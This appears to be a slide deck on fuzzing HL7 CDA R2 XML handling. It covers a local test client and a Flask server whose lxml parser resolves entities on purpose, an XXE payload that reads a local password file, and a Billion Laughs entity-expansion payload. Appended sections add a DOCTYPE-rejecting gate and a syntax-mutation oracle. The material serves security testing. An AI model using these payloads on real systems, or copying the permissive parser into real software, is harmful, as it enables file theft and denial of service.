<style>
.reveal .slides { text-align: left; }
.text-center { text-align: center; /* centre text */ }
.text-left { text-align: left; /* align text left */ }
.text-right { text-align: right; /* align text right */ }
</style>

# HL7 v3 & CDA Development Architecture Discussion

#### Jimmy 2023/7/21

---

# Contents

```shell
HL7 v3 & CDA Development Architecture Discussion
├── Goal
├── Schedule
├── Current Status
├── Discussion
└── Reference
```

---

# Goal

----

## Fuzz CDA R2 Syntax

- Element
  - Tag
  - Value
- Structure
  - Standard
  - Non-standard
- Encode

----

- [C-CDA](http://www.hl7.org/ccdasearch/index.html)
- [sample_ccdas](https://github.com/mdht/sample_ccdas/tree/master)

---

# Schedule

----

```shell
.
└── Schedule
    └── Timeline
```

----

## Timeline[🔗](https://jimmylala.notion.site/a7c7571ddba04d49919a2faab98de4f6?v=2eeec549cb8a460a98b539a77347ca0f&pvs=4)

<img src="https://hackmd.io/_uploads/SkPbNdU9h.png" style="display:block; margin:auto;">

---

# Current Status

----

```shell
└── Current Status
    ├── XML Client (socket)
    ├── XML Server (Flask)
    │   └── Result
    ├── XML External Entities expansion
    │   ├── Payload
    │   └── Result
    ├── XML DoS - Billion Laughs
    │   └── Result
    └── XML DoS - Quadratic Blowup
        └── Result
```

----

## XML Client (socket)

- Sends a hand-built HTTP request as raw bytes over a TCP socket, so the request line, headers and body stay exactly as we wrote them (no HTTP library normalises the payload).

```python
import socket


def make_http_xml_request(url, method, ip, port, payload=b""):
    """Build a raw HTTP/1.1 request carrying an XML body.

    `payload` must be bytes: Content-Length is the byte length, not the
    character count, otherwise a CDA file containing Chinese text gets
    truncated by the server.
    """
    headers = (
        f"{method} {url} HTTP/1.1\r\n"
        f"Host: {ip}:{port}\r\n"
        "Content-Type: application/xml\r\n"
        f"Content-Length: {len(payload)}\r\n"
        "Connection: close\r\n"
        "\r\n"
    )
    return headers.encode("ascii") + payload


def send_data_to_api_server(xml_data):
    # Open a TCP connection to the API server
    api_server_ip = "127.0.0.1"
    api_server_port = 5000
    client_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    client_socket.connect((api_server_ip, api_server_port))

    url = "/receive_data"
    # Build the HTTP request
    http_request = make_http_xml_request(url, "POST", api_server_ip, api_server_port, xml_data)
    print(http_request.decode("utf-8", errors="replace"))

    # Send the request to the API server
    client_socket.sendall(http_request)

    # Read the whole response (Connection: close makes the server end the stream)
    chunks = []
    while True:
        chunk = client_socket.recv(4096)
        if not chunk:
            break
        chunks.append(chunk)
    print("Response from API server:")
    print(b"".join(chunks).decode("utf-8", errors="replace"))

    # Close the socket
    client_socket.close()


if __name__ == "__main__":
    # XML payload to send; read as bytes so Content-Length is correct
    with open("門診處方籤(藥囑).xml", "rb") as f:
        xml_data = f.read()
    print(xml_data.decode("utf-8", errors="replace"))
    # Send it to the API server
    send_data_to_api_server(xml_data)
```

----

## XML Server (Flask)

- Can receive the request.
- Can print the received payload.

```python
from flask import Flask, request
import lxml.etree as ET

app = Flask(__name__)


@app.route('/receive_data', methods=['POST'])
def receive_data():
    # request.data is already bytes; lxml wants bytes when the document
    # carries an encoding declaration, so do not decode before parsing
    xml_data = request.data
    print("Received XML data:")
    print(xml_data.decode("utf-8", errors="replace"))  # decoded only for display

    # Processing logic goes here (parse the XML, store it in a database, ...)
    try:
        # Deliberately permissive: resolve_entities=True is the setting under
        # test for the XXE and entity-expansion payloads on the next slides.
        parser = ET.XMLParser(resolve_entities=True)
        root = ET.fromstring(xml_data, parser=parser)
        # Continue processing the XML here, e.g.:
        for child in root:
            print(child.tag, child.text)
        return str(root.text), 200
    except ET.ParseError as e:
        print("Can't parse XML data:", e)
        return "Can't parse XML data, but the data was received.", 200


if __name__ == '__main__':
    app.run(host='0.0.0.0', port=5000, debug=True)
```

----

### Result

![](https://hackmd.io/_uploads/Byz3SvP92.png)

----

## XML External Entities expansion

### Payload

```xml
<?xml version="1.0" encoding='UTF-8'?>
<!DOCTYPE comment [
  <!ELEMENT comment (#PCDATA)>
  <!ENTITY xxe SYSTEM "file:/password.txt">
]>
<comment>
  <text>&xxe;</text>
</comment>
```

- The `SYSTEM` entity is resolved by the server-side parser, so the file is read from the server's filesystem and lands in `text.text`, which the server's `for child in root` loop prints.

----

### Result

<img src="https://hackmd.io/_uploads/SklJJDwc3.png" style="display:block; margin:auto;">

----

## XML DoS - Billion Laughs

- Exponential entity expansion
- Multiple levels of nested entities
- `&lol9;` expands to 10^9 copies of `lol` (about 3 GB of text) from under 1 KB of input

```xml
<?xml version="1.0"?>
<!DOCTYPE lolz [
  <!ENTITY lol "lol">
  <!ELEMENT lolz (#PCDATA)>
  <!ENTITY lol1 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;">
  <!ENTITY lol2 "&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;">
  <!ENTITY lol3 "&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;">
  <!ENTITY lol4 "&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;">
  <!ENTITY lol5 "&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;">
  <!ENTITY lol6 "&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;">
  <!ENTITY lol7 "&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;">
  <!ENTITY lol8 "&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;">
  <!ENTITY lol9 "&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;">
]>
<lolz>&lol9;</lolz>
```

- Caveat when reading the result: libxml2, which lxml wraps, ships an entity-amplification check that refuses this classic nesting unless the parser is created with `huge_tree=True`, so a parse error here is the library's guard, not a sign that the server is safe against the quadratic variant below.

----

### Result

<img src="https://hackmd.io/_uploads/Sym7yDPc3.png" style="display:block; margin:auto;">

----

## XML DoS - Quadratic Blowup

- One large entity (tens of thousands of characters) referenced tens of thousands of times: no nesting, so loop/depth detection does not trigger, but the expanded document grows quadratically in the input size.

![](https://hackmd.io/_uploads/rJvI8DP5h.png)

----

### Result

<img src="https://hackmd.io/_uploads/SJMWDwvc3.png" style="display:block; margin:auto;">

---

# Discussion

----

```shell
.
└── Discussion
    ├── Syntax Fuzz
    └── Development
```

----

## Syntax Fuzz

- We do not yet know whether the data was actually parsed: the server returns 200 whether parsing succeeds or fails, so the client cannot tell the two cases apart.
- Can we use the Taiwan standard?
- After sending an XML attack, how do we know whether it succeeded?

----

## Development

- Where should we add the code (which directory)?
- What code should we implement?

<img src="https://hackmd.io/_uploads/H1VOhOvc3.png" style="display:block; margin:auto;">

---

# Reference

- [XML Vulnerabilities and Attacks cheatsheet](https://gist.github.com/jordanpotti/04c54f7de46f2f0f0b4e6b8e5f5b01b0)
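---

## Added example: DOCTYPE gate and a parse oracle

The server slide parses with `resolve_entities=True`, and the Syntax Fuzz slide notes that the client cannot tell whether parsing succeeded because both branches answer 200. The block below is an added example, not code from the deck: a pre-parse gate that rejects any document carrying a `<!DOCTYPE>` (every payload on the attack slides needs one, a CDA document never does) and maps the outcome to a distinguishable status code. It uses only the standard-library expat parser, so it works in front of whichever parser the Flask handler keeps. The function names `classify_xml` and `handle_body` and the three sample documents are assumptions; the CDA-like sample is a constructed minimal header, not a real instance.

```python
import time
import xml.parsers.expat as expat


class DoctypeRejected(Exception):
    """Raised from the expat callback the moment a <!DOCTYPE ...> is seen."""


def classify_xml(xml_bytes):
    """Classify an incoming XML body before any entity can be expanded.

    Returns "rejected_doctype" (a DTD is present), "parse_error"
    (not well-formed) or "ok" (well-formed and DTD-free).
    """
    parser = expat.ParserCreate()

    def on_doctype(name, system_id, public_id, has_internal_subset):
        # Fires before the internal subset is read, so no entity is ever
        # declared, let alone expanded or fetched.
        raise DoctypeRejected(name)

    parser.StartDoctypeDeclHandler = on_doctype
    # Defence in depth: returning 0 aborts the parse if an external entity
    # reference is ever reached (it cannot be once DOCTYPE is rejected).
    parser.ExternalEntityRefHandler = lambda context, base, system_id, public_id: 0
    try:
        parser.Parse(xml_bytes, True)
    except DoctypeRejected:
        return "rejected_doctype"
    except expat.ExpatError:
        return "parse_error"
    return "ok"


def handle_body(xml_bytes):
    """(status, verdict, seconds) a fixed /receive_data handler should return.

    Unlike the server on the slide, which answers 200 in both branches, this
    lets a fuzzing client tell accepted, rejected and malformed input apart,
    and the wall-clock figure is the oracle for the DoS payloads.
    """
    started = time.perf_counter()
    verdict = classify_xml(xml_bytes)
    elapsed = time.perf_counter() - started
    return (200 if verdict == "ok" else 400), verdict, elapsed


# Constructed samples mirroring the slides (assumptions, not captured traffic).
XXE_PAYLOAD = b"""<?xml version="1.0" encoding='UTF-8'?>
<!DOCTYPE comment [
  <!ELEMENT comment (#PCDATA)>
  <!ENTITY xxe SYSTEM "file:/password.txt">
]>
<comment><text>&xxe;</text></comment>"""

BILLION_LAUGHS = b"""<?xml version="1.0"?>
<!DOCTYPE lolz [
  <!ENTITY lol "lol">
  <!ENTITY lol1 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;">
  <!ENTITY lol2 "&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;">
]>
<lolz>&lol2;</lolz>"""

CDA_LIKE = b"""<?xml version="1.0" encoding="UTF-8"?>
<ClinicalDocument xmlns="urn:hl7-org:v3">
  <typeId root="2.16.840.1.113883.1.3" extension="POCD_HD000040"/>
  <title>Outpatient prescription</title>
</ClinicalDocument>"""


def run_samples():
    """Verdict per sample; the truncated copy stands in for a broken mutant."""
    return {
        "xxe": classify_xml(XXE_PAYLOAD),
        "billion_laughs": classify_xml(BILLION_LAUGHS),
        "cda_like": classify_xml(CDA_LIKE),
        "truncated": classify_xml(CDA_LIKE[:-20]),
    }


if __name__ == "__main__":
    for name, verdict in run_samples().items():
        print(f"{name:15} -> {verdict}")
```

If the handler stays on lxml, the gate does not replace the parser settings: build it as `ET.XMLParser(resolve_entities=False, no_network=True)` and leave `huge_tree` at its default so libxml2's expansion limits stay on. The gate then only has to catch documents that smuggle a DTD past a parser someone later reconfigures.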
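---

## Added example: CDA R2 syntax mutants and a findings oracle

The Goal slide lists five things to fuzz in CDA R2 syntax (element, tag, value, structure, encode) and the Syntax Fuzz slide asks how to tell whether a mutant was parsed. The block below is an added example, not code from the deck: one deterministic mutant per class generated from a constructed CDA-like seed, plus a `syntax_findings` oracle that returns an empty list for a clean document and a named finding otherwise. The seed document, the `KNOWN`/`REQUIRED` header subset and all function names are assumptions; the real CDA R2 schema has far more required elements, so the subset is only enough to show the mechanism.

```python
import copy
import re
import xml.etree.ElementTree as ET

NS = "urn:hl7-org:v3"
ET.register_namespace("", NS)  # serialise with a default namespace, not ns0:

# Constructed minimal CDA-like seed (assumption: only the header elements
# needed for the five mutation classes, not a valid CDA instance).
SEED_DOC = b"""<?xml version="1.0" encoding="UTF-8"?>
<ClinicalDocument xmlns="urn:hl7-org:v3">
  <typeId root="2.16.840.1.113883.1.3" extension="POCD_HD000040"/>
  <id root="2.16.840.1.113883.19.5" extension="example-1"/>
  <title>Outpatient prescription</title>
  <effectiveTime value="20230721"/>
</ClinicalDocument>"""

# Subset of the CDA R2 header used by this example (extend from the spec).
KNOWN = {"typeId", "id", "title", "effectiveTime"}
REQUIRED = {"typeId", "id", "effectiveTime"}
OID = re.compile(r"^[0-2](\.(0|[1-9][0-9]*))+$")


def _q(name):
    return f"{{{NS}}}{name}"


def _serialize(root):
    return b'<?xml version="1.0" encoding="UTF-8"?>\n' + ET.tostring(root, encoding="utf-8")


def mutate_element(root):
    """Element: drop a required child (typeId is mandatory in CDA R2)."""
    r = copy.deepcopy(root)
    r.remove(r.find(_q("typeId")))
    return _serialize(r)


def mutate_tag(root):
    """Tag: rename a standard element to a non-standard name."""
    r = copy.deepcopy(root)
    r.find(_q("title")).tag = _q("titel")
    return _serialize(r)


def mutate_value(root):
    """Value: keep the tag, break the datatype (OID -> free text)."""
    r = copy.deepcopy(root)
    r.find(_q("typeId")).set("root", "not-an-oid")
    return _serialize(r)


def mutate_structure(doc):
    """Structure: well-formedness break, here an unclosed root element."""
    return doc.replace(b"</ClinicalDocument>", b"")


def mutate_encode(doc):
    """Encode: declaration says UTF-8 but the body carries an invalid byte."""
    return doc.replace(b"Outpatient", b"Outpa\xe9tient")


def generate_mutants(doc=SEED_DOC):
    root = ET.fromstring(doc)
    return {
        "element": mutate_element(root),
        "tag": mutate_tag(root),
        "value": mutate_value(root),
        "structure": mutate_structure(doc),
        "encode": mutate_encode(doc),
    }


def syntax_findings(doc):
    """Oracle: [] means well-formed and consistent with the header subset."""
    try:
        root = ET.fromstring(doc)
    except ET.ParseError as e:
        return [f"not well-formed: {e}"]
    findings = []
    if root.tag != _q("ClinicalDocument"):
        findings.append("root is not ClinicalDocument")
    present = {child.tag.split("}")[-1] for child in root}
    findings += [f"missing {n}" for n in sorted(REQUIRED - present)]
    findings += [f"non-standard element {n}" for n in sorted(present - KNOWN)]
    type_id = root.find(_q("typeId"))
    if type_id is not None and not OID.match(type_id.get("root", "")):
        findings.append("typeId/@root is not an OID")
    return findings


def run():
    """Findings per mutation class, the per-case result a fuzz loop records."""
    return {name: syntax_findings(m) for name, m in generate_mutants().items()}


if __name__ == "__main__":
    for name, findings in run().items():
        print(f"{name:10} -> {findings}")
```

The split between the two oracles matters for the fuzz loop: `structure` and `encode` mutants fail at the parser, so the server only ever sees a parse error, while `element`, `tag` and `value` mutants are well-formed XML that only a CDA-aware check catches, which is where a permissive `except ParseError` server reports success.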